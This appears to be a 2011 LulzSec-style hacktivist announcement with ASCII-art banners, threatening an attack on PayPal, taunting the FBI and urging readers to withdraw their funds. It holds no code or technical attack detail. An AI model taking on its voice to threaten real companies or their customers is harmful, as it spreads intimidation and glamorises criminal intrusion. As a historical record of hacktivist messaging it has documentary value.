.| $$ | $$ /$$__ $$
.| $$ /$$ /$$| $$ /$$$$$$$$| $$ \__/ /$$$$$$ /$$$$$$$
.| $$ | $$ | $$| $$|____ /$$/| $$$$$$ /$$__ $$ /$$_____/
.| $$ | $$ | $$| $$ /$$$$/ \____ $$| $$$$$$$$| $$
.| $$ | $$ | $$| $$ /$$__/ /$$ \ $$| $$_____/| $$
.| $$$$$$$$| $$$$$$/| $$ /$$$$$$$$| $$$$$$/| $$$$$$$| $$$$$$.$
.|________/ \______/ |__/|________/ \______/ \_______/ \_______/
//Laughing at your security since 2011!

.-- .-""-.
. ) ( )
. ( ) (
. / )
. (_ _) 0_,-.__
. (_ )_ |_.-._/
. ( ) |lulz..\
. (__) |__--_/
. |'' ``\ |
. | [Lulz] \ | /b/
. | \ ,,,---===?A`\ | ,==x'
. ___,,,,,---==""\ |M] \ | ;|\ |>
. _ _ \ ___,|H,,---==""""cno,
. o 0 (_) (_) \ / _ AWAW/
. / _(|)_ dMM/
. \@_,,,,,,---==" \ \\|// MW/
.--''''" =O= d/
. // SET SAIL FOR FAIL!
. ,'_________________________
. \ \ \ \ ,/~~~~~~~~~~~~~~~~~~~~~~~~~~~
. _____ ,' ~~~ .-"~"-.~~~~~~ .-"~"-.
. .-""-. ///==--- /`-._ ..-' -.__..-'
. `-.__..-' =====\\\\\\ X/ .---\.
. ~~~~~~~~~~~~, _',--/_.\ .-"~"-.
. .-"~"-.___` -- \| -.__..-

Friends, LulzLizards and enemies around the globe,

The hateful fiends at PayPal have unleashed FBI sea dogs to hunt down some of the more beloved members of our battlefleet. That is why we have decided to raise anchor and leave harbour for one final journey on the seven proxseas. We've set our LulzCannon's sights on the smarmy pirates of PayPal and will take no prisoners.Take this as a warning from your friendly LulzBoat captain. Wise little LulzLizards should withdraw their funds from PayPal before we do.we're coming for you, PayPal. We gon' find you. We gon' find you. You can run and tell that.

http://pastebin.com/3hb1CRdK

Related:
http://esploit.blogspot.com/2011/07/lulzsec-message-paypal.html